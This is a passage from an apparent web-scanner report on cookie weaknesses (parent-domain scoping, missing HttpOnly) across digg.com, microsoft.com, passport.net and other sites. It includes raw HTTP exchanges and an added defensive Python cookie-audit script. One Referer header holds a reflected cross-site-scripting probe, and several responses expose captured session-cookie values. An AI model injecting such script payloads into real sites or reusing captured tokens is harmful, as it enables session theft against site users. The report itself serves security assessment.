Set-cookie: ra1_sgm=i4-b510-7K0-e5r0-I3r0; Expires=Thu, 05-Jul-2012 15:39:06 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sid=3; Expires=Thu, 05-Jul-2012 15:39:06 GMT; Path=/; Domain=gwallet.com; Version=1


9.43. http://rs.gwallet.com/r1/pixel/x368

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rs.gwallet.com
Path:   /r1/pixel/x368

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: ra1_uid, ra1_sgm, ra1_sid. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r1/pixel/x368 HTTP/1.1
Host: rs.gwallet.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/iaction/UMIRF_IE9_BOW_Final_InitialView_Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServer.radiumone.gwallet.com=MTAuMTAxLjIuMTAyIDg4ODg=; ra1_uid=4626038992661376064; ra1_sgm=S4-740-e5b0-I3b0; ra1_sid=3

Response

HTTP/1.1 302 Found
Content-Length: 0
Server: radiumone/1.2
Cache-control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Content-type: application/octet-stream
Expires: Tue, 29 Oct 2002 19:50:44 GMT
Location: http://rs.gwallet.com/r1/pixel/x1094?r1s=enJsne_2xin_W0gqpJPdDOiRtZgEH_OufcvtkeNI5aQ
Pragma: no-cache
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-cookie: ra1_uid=4626038992661376064; Expires=Thu, 05-Jul-2012 15:39:03 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sgm=i4-b510-7K0-e5r0-I3r0; Expires=Thu, 05-Jul-2012 15:39:03 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sid=3; Expires=Thu, 05-Jul-2012 15:39:03 GMT; Path=/; Domain=gwallet.com; Version=1


9.44. http://rs.gwallet.com/r1/pixel/x369

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rs.gwallet.com
Path:   /r1/pixel/x369

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: ra1_uid, ra1_sgm, ra1_sid. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r1/pixel/x369 HTTP/1.1
Host: rs.gwallet.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/iaction/UMIRF_IE9_BOW_Final_InitialView_Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServer.radiumone.gwallet.com=MTAuMTAxLjIuMTAyIDg4ODg=; ra1_uid=4626038992661376064; ra1_sgm=S4-740-e5b0-I3b0; ra1_sid=3

Response

HTTP/1.1 302 Found
Content-Length: 0
Server: radiumone/1.2
Cache-control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Content-type: application/octet-stream
Expires: Tue, 29 Oct 2002 19:50:44 GMT
Location: http://rs.gwallet.com/r1/pixel/x1225?r1s=OUPv0729NeoDz8CeIHHoYeiRtZgEH_OufcvtkeNI5aQ
Pragma: no-cache
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-cookie: ra1_uid=4626038992661376064; Expires=Thu, 05-Jul-2012 15:39:03 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sgm=i4-b510-7K0-e5r0-I3r0; Expires=Thu, 05-Jul-2012 15:39:03 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sid=3; Expires=Thu, 05-Jul-2012 15:39:03 GMT; Path=/; Domain=gwallet.com; Version=1


10. Cookie without HttpOnly flag set
There are 73 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, the browser withholds that cookie from client-side script: document.cookie neither returns it nor overwrites it. This prevents an injected script (for example, one delivered through cross-site scripting) from trivially capturing the cookie's value and sending it to an attacker.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless legitimate client-side script in your application needs to read or set a cookie's value, set the HttpOnly flag by including the attribute in the relevant Set-Cookie header.

Be aware that the restriction imposed by the HttpOnly flag can be circumvented in some circumstances, and that script injection enables many serious attacks besides simple cookie theft: an injected script can issue requests within the victim's authenticated session without ever reading the cookie, so HttpOnly limits the damage of XSS but does not remove the need to fix it.
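As an added illustration, not part of the scanner report, the following Python script checks raw HTTP responses for the two cookie-attribute issues this report flags: a Domain attribute that scopes the cookie to a parent of the issuing host (findings 9.40 to 9.44 above) and a missing HttpOnly flag (section 10). The sample responses are constructed from headers shown in this report, with long cookie values trimmed. The session-token heuristic (cookie names containing sess, sid, session, token or auth) is an assumption of this example, a rough stand-in for the scanner's own classification, and the lowercase header matching is there because some servers above emit "Set-cookie".

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Assumed heuristic mirroring the report's "appears to contain a session token":
# cookie names that conventionally carry a session identifier.
SESSION_NAME_RE = re.compile(r"sess|sid|session|token|auth", re.IGNORECASE)


@dataclass
class CookieFinding:
    name: str
    domain: Optional[str]
    looks_like_session: bool
    issues: List[str] = field(default_factory=list)


def parse_set_cookie(header_value: str) -> Tuple[str, str, Dict[str, str]]:
    """Split one Set-Cookie value into (name, value, {attribute_lower: value}).

    Attributes are split on ';' only, so an Expires date such as
    'Mon, 02-Jan-2012 11:21:55 GMT' survives intact; flag attributes
    without a value (HttpOnly, Secure) map to an empty string.
    """
    parts = [p.strip() for p in header_value.split(";")]
    name, _, value = parts[0].partition("=")
    attrs: Dict[str, str] = {}
    for part in parts[1:]:
        if part:
            key, _, val = part.partition("=")
            attrs[key.strip().lower()] = val.strip()
    return name.strip(), value.strip(), attrs


def scoped_to_parent(host: str, domain: Optional[str]) -> bool:
    """True when the Domain attribute names a parent of the issuing host,
    i.e. the cookie will also be sent to every sibling subdomain."""
    if not domain:
        return False  # no Domain attribute: host-only cookie
    domain = domain.lstrip(".").lower()
    host = host.lower()
    return host != domain and host.endswith("." + domain)


def audit_response(raw_response: str, host: str) -> List[CookieFinding]:
    """Check every Set-Cookie header of a raw HTTP response for a missing
    HttpOnly flag and for a Domain attribute wider than the issuing host."""
    findings: List[CookieFinding] = []
    for line in raw_response.splitlines():
        if line.strip() == "":
            break  # end of headers; the body is not inspected
        header, _, value = line.partition(":")
        if header.strip().lower() != "set-cookie":  # also matches 'Set-cookie'
            continue
        name, _cookie_value, attrs = parse_set_cookie(value)
        finding = CookieFinding(
            name=name,
            domain=attrs.get("domain"),
            looks_like_session=bool(SESSION_NAME_RE.search(name)),
        )
        if "httponly" not in attrs:
            finding.issues.append("missing HttpOnly")
        if scoped_to_parent(host, finding.domain):
            finding.issues.append(
                f"scoped to parent domain {finding.domain.lstrip('.')}"
            )
        findings.append(finding)
    return findings


# Constructed sample responses, trimmed from the headers shown in this report.
TURN_RESPONSE = "\n".join([
    "HTTP/1.1 302 Moved Temporarily",
    "Server: Apache-Coyote/1.1",
    "Set-Cookie: uid=4325897289836481830; Domain=.turn.com; "
    "Expires=Mon, 02-Jan-2012 11:21:55 GMT; Path=/",
    "Set-Cookie: rrs=3%7C6%7C9; Domain=.turn.com; "
    "Expires=Mon, 02-Jan-2012 11:21:55 GMT; Path=/",
    "Content-Length: 0",
    "",
])
DIGG_RESPONSE = "\n".join([
    "HTTP/1.1 200 OK",
    "Server: Apache",
    "Set-Cookie: SESSffbdf82fc09bcc0e216782b4624d5374="
    "96839786b8fdb7818a75089363be3cac; "
    "expires=Fri, 29-Jul-2011 14:54:34 GMT; path=/; domain=.about.digg.com",
    "Content-Type: text/html; charset=utf-8",
    "",
    "<!DOCTYPE html>",
])
# The same session cookie issued as the remediation above recommends.
DIGG_RESPONSE_HARDENED = DIGG_RESPONSE.replace(
    "domain=.about.digg.com", "domain=.about.digg.com; HttpOnly"
)

if __name__ == "__main__":
    for host, raw in (("r.turn.com", TURN_RESPONSE),
                      ("about.digg.com", DIGG_RESPONSE),
                      ("about.digg.com", DIGG_RESPONSE_HARDENED)):
        for f in audit_response(raw, host):
            tag = " (session-like)" if f.looks_like_session else ""
            print(f"{host}: {f.name}{tag}: {', '.join(f.issues) or 'ok'}")
```

Run against the turn.com response, both cookies are reported as lacking HttpOnly and as scoped to turn.com; the about.digg.com session cookie is reported only for the missing flag, since its domain equals the issuing host, and the hardened variant produces no findings.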



10.1. http://about.digg.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://about.digg.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: SESSffbdf82fc09bcc0e216782b4624d5374. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: about.digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Set-Cookie: SESSffbdf82fc09bcc0e216782b4624d5374=96839786b8fdb7818a75089363be3cac; expires=Fri, 29-Jul-2011 14:54:34 GMT; path=/; domain=.about.digg.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 06 Jul 2011 11:21:14 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17973


<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

10.2. http://about.digg.com/ads

Summary

Severity:   Low
Confidence:   Firm
Host:   http://about.digg.com
Path:   /ads

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: SESSffbdf82fc09bcc0e216782b4624d5374. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads HTTP/1.1
Host: about.digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Set-Cookie: SESSffbdf82fc09bcc0e216782b4624d5374=8d9cb78aa1d77381647579b491d16261; expires=Fri, 29-Jul-2011 14:54:34 GMT; path=/; domain=.about.digg.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 06 Jul 2011 11:21:14 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 7213
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

10.3. http://about.digg.com/blog

Summary

Severity:   Low
Confidence:   Firm
Host:   http://about.digg.com
Path:   /blog

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: SESSffbdf82fc09bcc0e216782b4624d5374. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /blog HTTP/1.1
Host: about.digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Set-Cookie: SESSffbdf82fc09bcc0e216782b4624d5374=d3bd911c4412a5f105a30b014982aaed; expires=Fri, 29-Jul-2011 14:54:36 GMT; path=/; domain=.about.digg.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 06 Jul 2011 11:21:16 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15614


<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

10.4. http://about.digg.com/contact

Summary

Severity:   Low
Confidence:   Firm
Host:   http://about.digg.com
Path:   /contact

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: SESSffbdf82fc09bcc0e216782b4624d5374. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /contact HTTP/1.1
Host: about.digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Set-Cookie: SESSffbdf82fc09bcc0e216782b4624d5374=183f9d06f7faf23f4425f2bca06ffba5; expires=Fri, 29-Jul-2011 14:54:36 GMT; path=/; domain=.about.digg.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 06 Jul 2011 11:21:16 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 7886
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

10.5. http://about.digg.com/faq

Summary

Severity:   Low
Confidence:   Firm
Host:   http://about.digg.com
Path:   /faq

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: SESSffbdf82fc09bcc0e216782b4624d5374. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /faq HTTP/1.1
Host: about.digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Set-Cookie: SESSffbdf82fc09bcc0e216782b4624d5374=2eb23705fdf587154cd28b12c4d39ae6; expires=Fri, 29-Jul-2011 14:54:36 GMT; path=/; domain=.about.digg.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 06 Jul 2011 11:21:16 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25290


<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

10.6. http://about.digg.com/partnership

Summary

Severity:   Low
Confidence:   Firm
Host:   http://about.digg.com
Path:   /partnership

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: SESSffbdf82fc09bcc0e216782b4624d5374. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /partnership HTTP/1.1
Host: about.digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Set-Cookie: SESSffbdf82fc09bcc0e216782b4624d5374=81512413a75972f559239632a17b7d62; expires=Fri, 29-Jul-2011 14:54:35 GMT; path=/; domain=.about.digg.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 06 Jul 2011 11:21:15 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 8103


<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

10.7. http://about.digg.com/privacy

Summary

Severity:   Low
Confidence:   Firm
Host:   http://about.digg.com
Path:   /privacy

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: SESSffbdf82fc09bcc0e216782b4624d5374. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /privacy HTTP/1.1
Host: about.digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Set-Cookie: SESSffbdf82fc09bcc0e216782b4624d5374=5dae80891524c3f10a5dd8dcaee38263; expires=Fri, 29-Jul-2011 14:54:37 GMT; path=/; domain=.about.digg.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 06 Jul 2011 11:21:17 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16757


<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

10.8. http://about.digg.com/terms-use

Summary

Severity:   Low
Confidence:   Firm
Host:   http://about.digg.com
Path:   /terms-use

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: SESSffbdf82fc09bcc0e216782b4624d5374. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /terms-use HTTP/1.1
Host: about.digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Set-Cookie: SESSffbdf82fc09bcc0e216782b4624d5374=790163a5d0bb3c66f0901f4df9eaeead; expires=Fri, 29-Jul-2011 14:54:37 GMT; path=/; domain=.about.digg.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 06 Jul 2011 11:21:17 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24783


<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

10.9. https://accountservices.passport.net/gethip.srf

Summary

Severity:   Low
Confidence:   Firm
Host:   https://accountservices.passport.net
Path:   /gethip.srf

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: HIPSession. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gethip.srf?lc=1033&fid=2044200945&id=75046&fre=hard&type=visual HTTP/1.1
Host: accountservices.passport.net
Connection: keep-alive
Referer: https://accountservices.passport.net/uiresetpw.srf?mkt=EN-US&lc=1033&id=75046
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CkTst=G1309951137024

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 19932
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 11:20:14 GMT
Server: Microsoft-IIS/7.5
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
Set-Cookie: HIPSession=45S*6vuIWEDZGNM0*09htdJwOMobm7R5E2ZMW2RB2dSGkqC*apBp98w1vt43A3esAug*iHMBVLNvVAtuPikOTavfE!XPLQvoM*ecgi7xDXNJg$; domain=.passport.net;path=/;version=1
PPServer: PPV: 30 H: BAYIDSPROF1D05 V: 0
Date: Wed, 06 Jul 2011 11:21:13 GMT
Connection: close

var HIPM={name:"HIPM",innerFrame:null,comeinURLr:"",comeinURL:"",vv:"",eEmpty:"",eTooLong:"",eWrongAnswer:"",solutionElemt:"",afr:"audio",vfr:"visual",instruction:"",starttime:null,endtime:null,solnti
...[SNIP]...

10.10. http://c.microsoft.com/trans_pixel.aspx

Summary

Severity:   Low
Confidence:   Firm
Host:   http://c.microsoft.com
Path:   /trans_pixel.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /trans_pixel.aspx?tz=-5&ti=Microsoft%20Search%20Preferences%20Page&fi=1&fv=10.3&r=http%3A%2F%2Fburp%2Fshow%2F0&ts=1309951354314&sr=1920x1200&bs=1041x985 HTTP/1.1
Host: c.microsoft.com
Proxy-Connection: keep-alive
Referer: http://search.microsoft.com/Preference.aspx?bd498%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Ef1d3c6b4585=1&mkt=en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; mcI=Thu, 09 Jun 2011 16:24:17 GMT; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; msdn=L=1033; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; s_vnum=1311213700142%26vn%3D2; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=06/21/2011 12:35:21&Microsoft.VisitStartDate=06/21/2011 12:32:03&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=29&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1309940116672:ss=1309940093261

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Server: Microsoft-IIS/7.5
Set-Cookie: MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=c7fac793-ceeb-435f-829d-6351edfd89a3&Microsoft.CreationDate=07/06/2011 11:22:37&Microsoft.LastVisitDate=07/06/2011 11:22:38&Microsoft.NumberOfVisits=2&SessionCookie.Id=26FDF2F789E3D4343E8A3F6065EE6BF1; domain=microsoft.com; expires=Wed, 06-Jul-2011 11:52:38 GMT; path=/
Set-Cookie: MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/06/2011 11:22:38&Microsoft.VisitStartDate=07/06/2011 11:22:37&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=31&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; domain=microsoft.com; expires=Thu, 05-Jul-2012 11:22:38 GMT; path=/
Set-Cookie: MS0=3382a99b723844019751e1a79738c963; domain=.microsoft.com; expires=Wed, 06-Jul-2011 11:52:38 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 06 Jul 2011 11:22:38 GMT
Content-Length: 44

GIF89a........3....!.......,........@...Q.;.

10.11. http://developers.digg.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://developers.digg.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: developers.digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Set-Cookie: SESS395417e620b9b9b47288b47745f54be6=98edcda430c01adc5de44ed3b21784ec; expires=Fri, 29-Jul-2011 14:54:56 GMT; path=/; domain=.developers.digg.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 06 Jul 2011 11:21:36 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 5997
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

10.12. http://jobs.digg.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://jobs.digg.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: jobs.digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Set-Cookie: SESSb35b189ffa137f2f4ba6e0ebbe3d6f9c=e8b60e479e4f64320ce8065cb6d3ca23; expires=Fri, 29-Jul-2011 15:10:31 GMT; path=/; domain=.jobs.digg.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 06 Jul 2011 11:37:11 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34771

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...

10.13. http://knowledgelayer.softlayer.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://knowledgelayer.softlayer.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: knowledgelayer.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:00 GMT
Server: Apache
Set-Cookie: PHPSESSID=f5088c0e2e03edd7fff01fa38f08d18e; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Length: 38314
Connection: close
Content-Type: text/html; charset=iso-8859-1


<!-- Start SoftLayerHeader -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
